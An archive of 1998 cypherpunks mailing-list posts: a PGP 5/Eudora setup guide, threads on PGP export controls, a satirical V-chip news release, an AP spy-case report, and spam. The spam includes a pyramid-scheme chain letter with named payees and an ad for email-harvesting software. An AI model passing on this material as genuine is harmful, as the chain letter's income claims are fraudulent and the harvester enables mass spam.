It seems to me that if the media is not providing that type of service to
me, then I might save myself time by accessing the original 'press releases'
by various government and corporate entities, and not have to wade through
mountains of media 'news' which adds little to what was handed to them on a
silver platter for advertising/disinformation/promotion purposes.

~ ~
Toto
 ~ ~
"The Xenix Chainsaw Massacre"
http://www.clas.net/~dave/public/xenix

"WebWorld & the Mythical Circle of Eunuchs"
http://www.clas.net/~dave/public/webworld

"InfoWar -- The Digital Revolution"
http://www.clas.net/~dave/public/infowar3

"Space Aliens Hide My Drugs"
http://www.clas.net/~dave/public/sahmd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 2 Apr 1998 21:52:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: instructs for using PGP 5 freeware with Eudora and 2.6.2 keys
Message-ID: <3.0.5.32.19980402215130.007a85d0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



Since I grew impatient navigating geocities' UI,
I am sending this in the hope that it will be useful.
Propogate at will.


Using Eudora+PGP 5 with
2.6.2-Compatible RSA Keys
for Win95 for Dummies

4/3/98
honig@alum.mit.edu

Intro

I explain how to install and use the slick Eudora and PGP 5 freeware on 
Windows95 while maintaining full back-compatability with PGP v. 2.6.2 users. 
The installation path for compatability with 262 is not the obvious one
a new user would take.  Thus this document.

The install takes about 10 minutes and the software is free.  The strength
of your key is the same.

What is Eudora?  PGP?

Eudora is a popular, powerful, easy to use GUI POP3 email client.  Free
versions
are available.

PGP is a public-key encryption package.  PGP 5 freeware includes a plug-in
for Eudora,
making secure email not only possible, but nearly transparent.  That is key
to widespread
use which is key to the success of any protocol.  

But some people use only PGP 2.6.2, or 262 it is built into their MacOS.
The problem is that
262 uses "RSA" keys only, but PGP 5 can also use "Diffie-Hellman" keys.  In
fact,
the freeware version of PGP 5 does not allow the creation of RSA keys.

These instructions tell you how to set up Eudora + PGP so you can
painlessly use these tools with all popular PGP versions.  The newer PGP 
does not generate keys that the earlier PGP can use; but the 
newer version imports them.  So if we take the trouble to use the older
version of PGP to make our key, we can use our slick GUI email tools with
everyone, even the 2.6.2 throwbacks who probably use rotary phones,
carburators, etc.

I use "PGP 2.6.2 key" to mean the RSA key version supported by PGP 2.6.2,
and "PGP 5 key" to mean the
Diffie-Hellman key supported by the freeware version.  Both variants are
based on the ease
of multiplying two numbers and difficulty of factoring the product of large
indivisible ("prime") numbers.


Installation Instructions

You will use defaults everywhere.

1. Download and install Eudora lite 3.05 (eul305.exe)
	from http://eudora.qualcomm.com/eudoralight/
	This creates c:\Eudora by default.

	Use Tools | Options | Getting Started and Hosts to specify
	your POP email account (e.g., joe@xyz.com) and your
	SMTP (outgoing) host (e.g., mail.isp.com).

	TEST: Run Eudora, send yourself email, wait a minute, retrieve it, exit.

2. Download and install PGP 5 freeware (pgpinstall.exe)
	Do NOT create a key if asked to do so.  PGP 5 makes keys incompatible
	with PGP 2.6.2.  You will use a 2.6.2-compatible key you make later on.

	This creates c:\Program Files\PGP\PGP5.0 and installs a plug-in
	to Eudora.

	TEST: Start Eudora, look for PGP tools in toolbar.


Easier Setup If You Can:

1 & 2. Download Eudora + PGP together 
	from http://eudora.qualcomm.com/eudoralight/
	and install.  (I can't access this so I don't know about installing it.)
	TEST: send yourself email as above.  Check for PGP tools as above.

HERE'S THE RETRO-COMPATABILITY PART

3. Download pgp262.zip.  
	Create new directory c:\pgp262.  Go there.
	Unzip the file there.  
	Read the instructions, you may have to set some variables before using PGP262
		SET PGPPATH=C:\PGP262
		SET PATH=C:\PGP262;%PATH%
		SET TZ=PST8PDT

	While in that directory:

4. Create a 2.6.2 key with PGP 2.6.2:
	 Run "pgp -kg" and do what it says.  You will provide a username. Use
	your email address.  You will also provide a passphrase to hide your
	private key.  Pick a phrase you can remember, that others can't guess.
	You'll have to type your passphrase to prove who you are (when you
	use your private key).

5. Export your 2.6.2 key to a file:
	Run "pgp -kxa yourname mykey" where "yourname" is the username you used
	above. This creates a file mykey.asc which is your public key suitable for
emailing.

6. Import your key into PGP 5:
	Double click on the file "mykey.asc" that you just created.  

7. Make sure your PGP262 key is your Default (e.g., if you made a PGP 5 key):
	Run PGPKeys, e.g., from Eudora.  Select your key with the blue icon.
	Right-click to see its properties. Its key type should be "RSA".
	Right-click and select Set As Default.

TO TEST PGP

Send yourself a regular email addressed to the username you used above,
which should
be your email address, to verify that functionality didn't break.  Then
send a second letter, this time, select Eudora's PGP MIME button AND the
PGP Encrypt button.  Then send your letters.  Wait a bit, and retrieve your
mail as you did before.  To read the encrypted version run the Plug-in.
You will be prompted for your passphrase.

If one of your dinosaur 2.6.2 associates sends you a block of text, use the
PGP Decrypt button.  You will be
prompted for your passphrase.

To send email to other people, you will have to import their public keys.


Security Note

Your private key is hidden in the \Program Files\PGP\PGP50\SECRING.SCR
file.    Its also
in the c:\pgp262\SECRING.PGP file.

If threse files are copied by opponents, only your passphrase stands
between them and your secret key.
Your mykey.asc file is the opposite: it should be published so people can
send messages to you (and verify that you signed and sent what was received
by them, etc.) PGPKeys lets you export your key to a well-known server
which functions like a phone directory.


honig@alum.mit.edu
------------------
"Are we going after their tax returns?  I can only hope that we are,
frankly, doing a little persecuting" ---Nixon to Erlichman,
on tax audits of wealth Jewish contributors to the Democrats.
	-LA Times 1.4.98






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: V75ortex <V75ortex@aol.com>
Date: Thu, 2 Apr 1998 20:22:07 -0800 (PST)
Subject: Here
Message-ID: <156fecdf.352456aa@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: V75ortex@aol.com
Subject: Here
From: V75ortex <V75ortex@aol.com>
Date: Thu, 2 Apr 1998 22:14:41 EST
Organization: AOL (http://www.aol.com)

<a href="http://www.adult-clicks.net/icon.html">Click here for 10 free
pics</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@neva.org>
Date: Fri, 3 Apr 1998 06:24:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199804030627.WAA00435@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 Apr 1998, Robert Hettinga wrote:

> At 2:32 AM -0500 on 4/2/98, David Honig wrote:
> > http://braggbbs.bragg.army.mil/libs/utils.htm
> > has a link to ftp://bbs.bragg.army.mil/library/utils/pgp262.zip
> 
> This is really nothing new. My understanding is that when Kelly Goen posted
> the original PGP to USENET, he set the distribution to US only, or at the
> very least North America only.
With a *.ca address, I'm wondering, in all situations do I follow the US
guidelines? Or are some different?

As for the "regulation" post, I was going to reply until I realized it was
just so she could donate email addresses to her book.

 
-confused cdn-


     







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Fri, 3 Apr 1998 02:07:42 -0800 (PST)
To: Jennifer DePalma <cypherpunks@toad.com
Subject: RE: regulating the internet
Message-ID: <896C7C3540C3D111AB9F00805FA78CE20278CD@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> Jennifer DePalma <jdepalma@cato.org> wrote:
> 
> >Anyone have any opinions on the feasibility of regulating the internet?
> 
Of course you can regulate the Internet, the Internet is *made*  of
regulation.  All it is is an agreement between people who run computers to
send and receive messages, and pass them on to other computers, according to
certain rules.  It is like the treaties between supposedly sovereign nation
states - you play by the rules if you want people to talk to you. 

The Internet is the best living example that you don't need governments to
have regulation (although the US government certainly helped a lot. Maybe
the Net or the Moon landings will go down in history as your pyramids or
Stonehenge, the one thing your civilisation will be remembered for). The
regulations will be made and broken and kept and changed by the people who
use the Net and no-one will ever know what they all are at any one time but
a lot of us will have a good idea of most of them, most of the time.

The Internet doesn't depend on telephone companies or governments or
undersea cables or satellites or university computing departments or cable
TV or copper wires or carrier pigeons (that reminds me - time for my annual
check up on the new RFCs :-) or  fibre optics or anything else, although it
uses all those things.  It is software, not hardware, it is a set of rules,
treaties,  agreements, protocols,  words, comments, jargon,   ideas,
thoughts. The Internet is  like money, or marriage, or table manners - while
people  act as if they believe in it,  then it will continue to exist.

Of course if what the question was  really about  the feasibility of
regulating what people use the Internet *for* - well, that's a different
question...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 2 Apr 1998 21:14:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: V-Chip Reruns...
Message-ID: <199804030514.HAA26081@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


A member of Peacefire (http://www.peacefire.org/join/) who has 
volunteered to pull the Fire Alarm at a White House To Be Named
Later, on April 19th, at 9:02 a.m., forwarded:

*******************************************************

[In honor of April Fool's Day, the following message about a "V-Chip
for books" was first posted on the Internet two years ago on April 1,
1996.
During that time, Internet censorship was a national concern after the
passing of the Communications Decency Act, and censorship systems for
the Internet, like the V-Chip for television, were just starting to 
gain public attention.  The news of a "V-Chip for books" was met with 
an outpouring of support from some parents who apparently didn't 
recognize it as a joke.]

[Forwarder's Note: There was also a great outpouring of support for 
 the gentleman who began the non-profit society promoting the clothing
 of animals, to cover their 'private parts.' While fools like yourself
 'work for a living,' eh?]

News Release -- April 1st, 1996

        V-chip rating system extended to books

                CLA endorses 'V-barcode' plan

The Canadian Library Association today announced its
intention to comply with the wishes of millions of
Canadians who had signed a petition decrying the increasing
presence of "vivid imagery of sex and violence" in books
targetted at children.

"Once my daughter started reading books in the 'Goose Bumps'
series", says one concerned parent, "reading became like an
addiction to her."  Even though the books were so violent and
scary the girl had nightmares.  "Soon she started reading beyond
her grade level and was getting into books with 'adult themes'."
The problem, say most busy parents, is that kids can visit
the local library and borrow anything they choose, regardless
of their family's values.

The new book rating system, modelled after television's highly
successful V-chip, has been dubbed the V-barcode, because each
book will have a machine-readable "barcode" on the spine that
encodes a rating of the book's contents on several scales:
sex, violence, coarse language, drug use, religion, and
'alternative lifestyles'.

"This isn't about censorship", says Keith Spicer, who recently
joined the CLA as policy director after leaving the CRTC, "this
is about choice, ... about empowering parents to make choices."
Under the new system, parents will select their family's
"tolerance levels" on each scale.  These are encoded as a barcode
on their child's library card.  When a child wants to borrow a
book, the librarian simply passes the library card and book over
a scanner (just like the ones used in the supermarket) and
a screen instantly displays whether authorization should
be granted.  "It's a marvel of technology", bubbles Spicer,
"it's just like the child's parent is there, saying to the child
-- 'No, we don't borrow that kind of book in this family.'".

The CLA dismisses complaints the system will be burdensome.
"We already have barcodes on most books, so the cost of the new
system will be incidental", said a CLA spokesperson.
Library patrons can expect to pay an additional $5 per year
over their normal borrowing fees.

"The V-barcode is just a small part of the overall solution
for dealing with violence in books," says Spicer.  "The best
way of dealing with bad books is to have more good books,
and we hope that once children stop borrowing the bad books
publishers will start printing books of better quality."

There are still a few wrinkles to be worked out, however.
Some skeptical parents think children might start hanging
out in libraries -- where they can still read books they
aren't allowed to borrow.  Still, to many parents, the new
system gives a parent more control over what their child reads
than is the case without this technology.  "It's a social
experiment worth trying", says one parent, "It will be
interesting to see what guidelines will be drawn up and
who will be doing the drawing.  It will force people to
reflect on ethics and reading, which is something we could
afford to be more reflective about."

Enthusiasts of the V-barcode would like to see its use expanded.
"We'd like to see the V-barcode system adopted in bookstores",
says Keith Spicer, "We've already got a pilot project going
with the Cole's Bookstore chain and the Bank of Montreal where
the parental tolerance levels are encoded into the mag-stripe
on the child's bank card."  A book purchase can be declined
at the checkout if it exceeds the family's tolerance levels.
"Cash purchases," says Spicer, "are still a problem."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Fri, 3 Apr 1998 09:47:09 -0800 (PST)
To: Sunder <rah@shipwright.com>
Subject: Re: illegal export of pgp.zip by .mil
In-Reply-To: <v04003a3fb1497f8db95d@[139.167.130.246]>
Message-ID: <3.0.5.32.19980403094710.007dd9b0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 AM 4/2/98 -0500, Sunder wrote:
>Instead of making a fuss over this, we should thank the very wise and
>very smart sysadmins at these .mil machines for providing this wonderful
>service for us.  By making themselves look totally clueless, they've provided
>for the spread of privacy and freedom of privacy!  That's truly commendable!
>
>Personally, I will raise my next glass of beer in their honor!  :)  

As of 6:57 this morning, according to the timestamp in
ftp://bbs.bragg.army.mil/library/
they removed pgp262.zip from their ftp site.  Though of course they didn't
bother to clean up
their link to it  :-P.  

Thanks to the civil servant readers of this list who phoned the boys at
Bragg.  The world is safe
again.  Apologies to the sysop who probably caught some abuse.




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

When exponentiation is outlawed, only outlaws will exponentiate.










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Fri, 3 Apr 1998 10:51:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ex-spook tells 2 other countries their codes are toast
Message-ID: <3.0.5.32.19980403105141.007a4560@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


http://www.newsday.com/ap/rnmpwh0j.htm

Ex-CIA Worker Charged in Spy Case

                        By MICHAEL J. SNIFFEN Associated Press Writer

                        WASHINGTON (AP) -- A fired CIA covert operative was
charged today with
                        tipping off two foreign governments that the United
States had broken their code
                        systems. He was held without bond.

                        Douglas Fred Groat also was charged with trying to
extort $500,000 from the CIA
                        in return for not disclosing its secrets.

                        Groat, a 50-year-old bearded and burly man, worked
for the CIA from May 1980
                        through October 1996 but spent the last three of
those years on administrative
                        leave. The grand jury charged that he gave secrets
about U.S. code-breaking to
                        two foreign governments, which were not named, in
March and April of 1997.

                        The grand jury said that Groat attempted to extort
money from the CIA began
                        before his alleged turncoat activities and
continued after them. The grand jury said
                        the attempted extortion lasted from May 1996 until
February 1998.

                        All four espionage counts allege that the spying
took place between March 24,
                        1997 and some time in April 1997.

                        A federal grand jury said in its indictment that
Groat gave both foreign countries
                        classified information concerning ``the targeting
and compromise of the
                        cryptographic systems of ... (the foreign country)
by the United States with intent
                        and reason to believe that said information would
be used to the injury of the
                        United States.''

                        Groat, who was arrested Wednesday night without
incident by the FBI, entered a
                        not guilty plea through his attorney, at federal
courthouse here, to all five counts
                        against him. Two of the counts carry a maximum
penalty of death.

                        Prosecutor Eric Dubelier persuaded U.S. District
Judge Norma Holloway Johnson
                        to continue holding the burly and bearded Groat
without bail by calling him ``a risk
                        of flight and a danger to the community.''

                        ``Based on his former employment with the CIA, he
is trained in travel and false
                        identity and deception,'' Dubelier said. ``He has
no ties to the community and he
                        possesses sensitive classified information'' that
could be communicated to foreign
                        nations if he were allowed to go free.

                        Johnson said that a federal grand jury had returned
a sealed indictment March 27
                        which included four counts of communicating secret
defense information to a
                        foreign government and one count of interference
with commerce.

                        Two of the counts of conveying secrets carry the
death penalty. It was not
                        immediately known which countries were involved.
Federal officials requesting
                        anonymity said there was more than one.

                        Groat himself did not speak during the 10-minute
initial appearance. Muscular and
                        heavy-set with black hair and a mustache, he
appeared in court wearing dark blue
                        jail trousers and shirt. He held his hands clasped
in front of him as he stood beside
                        his attorney, public defender A.J. Kramer.

                        The judge set a detention hearing for next
Thursday. And Dubelier said the
                        government would use the Classified Information
Procedures Act to prevent
                        secrets from being disclosed at trial.

                        Groat was the third current or former CIA employee
to be arrested for espionage
                        in the last four years.

                        He was fired from the CIA under circumstances that
officials would not
                        immediately disclose. They said he held a lower
rank than two of the biggest spies
                        ever caught inside the CIA -- Aldrich Ames, who
headed counterintelligence
                        against Moscow while secretly working for the
Russians, and Harold Nicholson,
                        who was a CIA station chief abroad while selling
secrets to Moscow. Ames and
                        Nicholson pleaded guilty in plea bargains with the
government.

                        An official familiar with the investigation said
the probe into this former CIA
                        employee ``does not rise to the level of the
Aldrich Ames case'' in terms of the
                        suspected damage to U.S. security.

                        Ames was arrested in 1994 and was sentenced to life
in prison without the chance
                        for parole. Ames gave the Soviets the names of at
least a dozen high-level moles
                        inside the Soviet government who were providing
information to the CIA. Many of
                        them were arrested and executed based on Ames'
information.

                        Nicholson gave the Russians the names of new CIA
recruits whom he helped
                        train. Officials said that limited where they could
serve later in their careers.

                        The CIA employee in this case worked at the ageny's
headquarters in Northern
                        Virginia and it was not clear if he had ever served
overseas.

                        The FBI was not seeking any accomplices in the
case, but officials would not say
                        whether any foreign diplomats were being expelled
from this country.

                        The names of the countries involved with the CIA
employee could not immediately
                        be learned.

                        The House and Senate intelligence committees were
kept informed of the
                        investigation into the spying charges as it
proceeded, congressional officials said
                        today, speaking on condition of anonymity.

                        An official said Senators have been actively
involved in following the investigation
                        since its inception.''

                        AP-NY-04-03-98 1331EST
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

When exponentiation is outlawed, only outlaws will exponentiate.










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdonnovan@hotmail.com
Date: Fri, 3 Apr 1998 13:47:48 -0800 (PST)
Subject: Golden Portfolio and Ca$h
Message-ID: <199804032147.NAA29714@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Introducing "7MG's" Golden Portfolio and the amazing    
7 MILLION DOLLAR GENERATOR!!!!

Make all your financial dreams come true within a 
few weeks!

5 people= $7,000,000!!!

The Golden Portfolio/"7-Million-Dollar-List" is a completely 
new,  revolutionary income opportunity which allows everyone
to achieve financial success with very little effort and only a 
small one-time stake. 

The GP"7-Million-Dollar-List" concept is extremely simple yet 
brilliant in it's ability to create profits for all participants with a 
logical and ingenious system. This system is cheat-proof and 
assures fast payments to all participants. There is no waiting
for company checks as all payments received are money orders..
straight to you!

No complicated spillovers, matrixes or other MLM non-sense.
This is a simple program which requires no work other than
the 10 steps listed below. 

The program is legal in that a product is exchanged for the
$160, a portfolio of information on such topics as effective
marketing, travel discounts, anonymous bank accounts etc.
7MG will deliver the product to your customers and monitor
the program to assure that you will get your payments sent
directly to you for a one time $20 fee.

How does it work?

There are seven positions on the  GP"7-Million-Dollar-List".

 Your one-time stake is US $160.
#1. Send $30 to the person in position 7   (your sponsor)
#2. Send $10 to the person in position 4   (bonus position)
#3. Send $100 to the person in position 1  (prime position)
#4. Send $20 to "7MG" (program administration)

All payments must be sent money order by fed-ex letters. Make 
sure to send copies of money orders and tracking numbers
to "7MG" who is monitoring and controlling the system closely. 
As soon as  "7MG" receives your membership registration with
the list of names approved, you can immediately proceed to 
the next step. A copy of this circular with your letter protector
code and your name in position #7 on the GP"7-Million Dollar
-List" will be sent to you along with your 9 reports.

All you have to do is to find at least 5 new members. Each of 
them will send you $30 via fed-ex  and you already have earned 
money! Your participation starts at position 7 on the GP
"7-Million-Dollar-List". Assuming that everyone will also introduce 
5 new members you wil get $10 each from 625 people when you
reach position 4 on the GP"7-Million-Dollar-List". This totals $6,250
- but this program is designed to rake much more money right into
 your pocket. 

 By continously moving up the list you will reach position
one within only a few short weeks. Being now in the prime position 
on thousands and thousands of  GP"7-Million-Dollar-Lists" 
you will receive up to 78,125 fed-ex letters containing $100 each.

THIS IS THE INCREDIBLE AMOUNT OF $7,812,500

You can keep this money, it's yours and there's nothing expected 
in return. *A series of reports will be e-mailed to all members 
by 7MG,  there's nothing for you to do but find 5 members and 
wait for your express letters with money orders. It should be 
very easy to convince other people of this opportunity. Make
sure to introduce as many new members as possible into this 
fantastic program.
*REPORTS in the Golden Portfolio
Effective and Affordable Marketing
Travel Discounts
Earn 30% in a Stable European Bank
Directory of International Maildrops
Opening an Offshore Bank
Anonymous Bank accounts
Protecting yourself from fraud
Obtaining assets for rent and Much More!

7MG is right now in global expansion and will experience 
phenomenal growth. Millions of potential participants worldwide 
are waiting already. So, leave nothing to chance - start right away
 to see your share of daily cash pouring into your mailbox !!

Wishing you Success!! Go For it Today!! 

~Sign up by April 10th and receive a $100 airline disc. certificate!!

Instructions:

1. Set up a fed-ex account. It's fast and super easy!
Call 1-800Gofedex or set up online at http://www.fedex.com
(You must set this account up, all packages will be tracked 
using the fedex software and any mail-based correspondence 
from "7MG" will be sent using your account number.)

2. Print and fill out the membership registration form
below.

3. Fax the form to 7MG for approval.(the list has to be 
verified against computer records to make sure no one has
falsely inserted a name or changed any address information- 
this assures that you get your money!) The letter will be sent
back approved or changed to the correct letter, then you can 
proceed to step #4.

4. Obtain 4 money orders in the amounts listed and 
obtain 4 Fedex airbills.

5. Fill the money orders out according to name and
destination and do the same for the airbills.

6. Write the tracking codes of the airbills on the 
money order slips.

7. Make a copy of all 4 money orders on one sheet of 
paper and Fax it to 1-847-759-2343

8. Mail out the money orders in the Fedex packages
the same day by standard overnight express. Important!

9. When we receive your faxed copy of the money orders you
will receive the golden portfolio and a copy of this
letter with your name in the #7 spot with a letter code
protector.

10. Proceed to send your letter out through e-mail. Remember
your goal is at least 5 participants. Don't stop until you
get 5 people! This is a MUST!!  A list of reputable bulk-email 
companies will be sent to you!
------------------------------------------------------------------------
--
(Print and Fax to 1-847-759-2343) Membership Registration: 

Yes, I want to become a member of 7MG and receive the
golden portfolio*. Please register my details and send 
approval for this list right away!

Fed-ex account number__________________________

Email address _________________________________    

Fax Number _________________________________    
                                                                
Name _______________________________________     
                              
Address______________________________________
(You must use a regular street address, FED-Ex will not 
ship to P.O. boxes. If you don't want to use your home 
address try a place like Mail Boxes Etc.)

City________________________________________    
                                
State____________Zip Code_____________________     

Country_____________________________

Letter Protector Code  #4285

Golden Portfolio/"7-Million-Dollar-List"

Position 1 (prime postion), send US $100     
R. McKinney 
4416 W. 170th street #A  
Lawndale, CA 90260

Position 2  GVHS Enterprises 
Position 3 Cherish Hatz

Position 4 (bonus positon, send US $10)    
CD Marketing
12166 Metric blvd. #243
Austin, TX 78758

Position 5 BT Enterprises 
Position 6 M & M Publications 

Position 7 (your sponsor, send US $30)      
C. Diane  
15900 Crenshaw bl. #572
Gardena, CA 90249

Monitor/Registration fee send US $20:
7MG
195 Stevens Ave.
Columbus, OH 43222




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 181855d6 <181855d6@msn.com>
Date: Thu, 2 Apr 1998 22:32:32 -0800 (PST)
To: <cybereye@compuserve.com>
Subject: No Subject
Message-ID: <19943672.886214@relay.comanche.denmark.eu>
MIME-Version: 1.0
Content-Type: text/plain


Authenticated sender is <181855d6@msn.com>
Subject:  and
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

EMAIL MARKETING WORKS!!

Bull's Eye Gold is the PREMIER email address collection tool.
This program allows you to develop TARGETED lists of email
addresses.  Doctors, florists, MLM, biz opp,...you can collect
anything...you are only limited by your imagination!  You can
even collect email addresses for specific states, cities, and
even countries!  All you need is your web browser and this program.
Our software utilizes the latest in search technology called
"spidering". By simply feeding the spider program a starting
website it will collect for hours. The spider will go from website
to targeted website providing you with thousands upon thousands of
fresh TARGETED email addresses. When you are done collecting,  the
spider removes duplicates and saves the email list in a ready to
send format. No longer is it necessary to send millions of ads to
get a handful of responses...SEND LESS...EARN MORE!!!

A terrific aspect of the Bull's Eye software is that there is
no difficult set up involved and no special technical mumbo-jumbo
to learn. All you need to know is how to search for your targeted
market in one of the many search engines and let the spider do the
rest! Not familiar with the search engines? No problem, we provide
you with a list of all the top search engines. Just surf to the
location of a search engine on your browser then search for the
market you wish to reach...it's that easy!

For instance if you were looking for email addresses of Doctors
in New York all you would do is:

1) Do a search using your favorite search engine by typing in
the words doctor(s) and New York
2) Copy the URL (one or more)...that's the stuff after the
http://...  for instance it might look like
http://www.yahoo.com/?doctor(s)/?New+York
3) Press the START button

THAT's IT!!!  The Bull's Eye spider will go to all the websites
that are linked, automatically extracting the email addresses
you want.

The spider is passive too! That means you can let it run all
day or all night while you are working on important things or
just having fun on your computer. There is no need to keep a
constant watch on it, just feed it your target market and give
it praise when it delivers thousands of email addresses at
the end of the day!

Features of the Bull's Eye Software:

* Does TARGETED searches of websites collecting the email
  addresses you want!
* Collects Email addresses by City, State, even specific
  Countries
* Runs Automatically...simply enter the Starting information,
  press The Start Button, and it does the rest
* Filters out duplicates
* Keeps track of URLs already visited
* Can run 24 hours per day, 7 days per week
* Fast and Easy List Management
* Also has built in filtering options...you can put in words
  that it "Must" have while searching,...you can even put in
  criteria that it  "Must NOT Have"...giving you added flexibility
* Also imports email addresses from any kind of files (text
  files, binary files, database files)
* List editor handles Multiple files to work on many lists
  simultaneously
* Has a Black-Book feature... avoid sending emails to people
  who do not want to receive it
* Built-in Mail program...send email directly on the internet
  with just a click of your mouse
* Personalized Emails...if the email address has the user's
  name when it is collected,..you can send Personalized emails!!!
* Sort by Location, Server, User Name, Contact Name
* Advanced Operations:
 Email address lists export in many different formats
  (HTML, Comma delimited, text file)
 Advanced editing...Transfer, Copy,  Addition, Delete, Crop,
  Move to Top/Bottom
 Operations between lists...Union, Subtraction, Comparison
* Program is Passive,...meaning you can run other programs at
  the same time

CALL FOR MORE INFORMATION   213-980-7850
CALL FOR MORE INFORMATION   213-980-7850

ORDERING INFORMATION

Customer Name
Company Name
Address
City
State                       Zip
Phone                                       Fax
Email Address

______ BULL'S EYE SOFTWARE   $259.00
Includes Software, Instructions, Technical Support

______ Shipping & Handling  (2-3 Day Fedex)  $10.00
                           (Fedex Overnite) $20.00

______  TOTAL
                 (CA Residents add applicable sales tax)

*All orders are for Win 95 and Win NT

                *****CREDIT CARDS ACCEPTED*****
                   MASTERCARD   VISA   AMEX

   PLEASE CALL 213-980-7850 to process your order
                        9am-5pm Pacific Time
                Checks or Money Orders send to:
                      WorldTouch Network Inc.
5670 Wilshire Blvd.  Suite 2170 Los Angeles, CA 90036
Please note:  Allow 5 business days for all checks to
clear before order is shipped.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@inexchange.net (Information Desk)
Date: Fri, 3 Apr 1998 14:00:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Advertisement: Website Hosting
Message-ID: <19980403200355480.FXZ157@out.inexchange.net>
MIME-Version: 1.0
Content-Type: text/plain


http://www.inexchange.net
info@inexchange.net

InExchange would like to introduce our complete Hosting and Promotional service.

     FOR ONLY $19.95 PER MONTH !

* 20 MB (megabytes) of disk space
* 750 MB  of data transfer per month
* 5 E-mail accounts
* INTERNATIONAL Hosting
* Access to your account anytime via the Web Control Panel
* Full MS Front Page support
* Unlimited FTP updates
* Personal CGI directory for your own scripts (or use ours)
* The best statistics analyzer in the industry
* E-mail forwarding, auto responders and vacation reply
* Domain name registration (www.yourname.com)
* FREE registration of your domain with over 250 search   engines
* Real Audio/Video support

* Inquire about our $16.95 plan

* Other plans also include:
  Shopping cart application and database access/utilities
  Cold Fusion Hosting
  CyberCash, iBill and VersaNet ready
  Instant on-line credit card processing

For additional details, please refer to our website:
http://inexchange.net
info@inexchange.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@inexchange.net (Information Desk)
Date: Sat, 4 Apr 1998 00:27:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Advertisement: Website Hosting
Message-ID: <19980403220442206.FYA175@out.inexchange.net>
MIME-Version: 1.0
Content-Type: text/plain


http://www.inexchange.net
info@inexchange.net

InExchange would like to introduce our complete Hosting and Promotional service.

     FOR ONLY $19.95 PER MONTH !

* 20 MB (megabytes) of disk space
* 750 MB  of data transfer per month
* 5 E-mail accounts
* INTERNATIONAL Hosting
* Access to your account anytime via the Web Control Panel
* Full MS Front Page support
* Unlimited FTP updates
* Personal CGI directory for your own scripts (or use ours)
* The best statistics analyzer in the industry
* E-mail forwarding, auto responders and vacation reply
* Domain name registration (www.yourname.com)
* FREE registration of your domain with over 250 search   engines
* Real Audio/Video support

* Inquire about our $16.95 plan

* Other plans also include:
  Shopping cart application and database access/utilities
  Cold Fusion Hosting
  CyberCash, iBill and VersaNet ready
  Instant on-line credit card processing

For additional details, please refer to our website:
http://inexchange.net
info@inexchange.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike <blazer@mail.nevalink.ru>
Date: Fri, 3 Apr 1998 11:51:35 -0800 (PST)
To: Sunder <sunder@brainlink.com>
Subject: Re: illegal export of pgp.zip by .mil
In-Reply-To: <v04003a3fb1497f8db95d@[139.167.130.246]>
Message-ID: <35253C1A.EA48DECE@mail.nevalink.ru>
MIME-Version: 1.0
Content-Type: text/plain


Guys, what are you talking about? Just go through any proxy that ends
with .us or .net or .com (or Anonymizer) and give any e-mail address
from hotmail or yahoo.com or anything else - and MIT pgp will be yours
in few minutes.

If this means "restrictions" I'm sorry ;)

Mike

Sunder wrote:
> 
> Instead of making a fuss over this, we should thank the very wise and
> very smart sysadmins at these .mil machines for providing this wonderful
> service for us.  By making themselves look totally clueless, they've provided
> for the spread of privacy and freedom of privacy!  That's truly commendable!
> 
> Personally, I will raise my next glass of beer in their honor!  :)
> 
> Robert Hettinga wrote:
> >
> > At 2:32 AM -0500 on 4/2/98, David Honig wrote:
> >
> > >
> > > http://braggbbs.bragg.army.mil/libs/utils.htm
> > > has a link to ftp://bbs.bragg.army.mil/library/utils/pgp262.zip
> >
> > This is really nothing new. My understanding is that when Kelly Goen posted
> > the original PGP to USENET, he set the distribution to US only, or at the
> > very least North America only.
> >
> > However, some mis-configured news machine actually exported PGP to the rest
> > of the world by ignoring the distribution request on those news messages.
> >
> > The machine in question had a .mil domain name. :-).
> >
> > Cheers,
> > Bob Hettinga
> 
> --
> 
> =====================================Kaos=Keraunos=Kybernetos==============
> .+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
> ..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
> <--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
> ../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
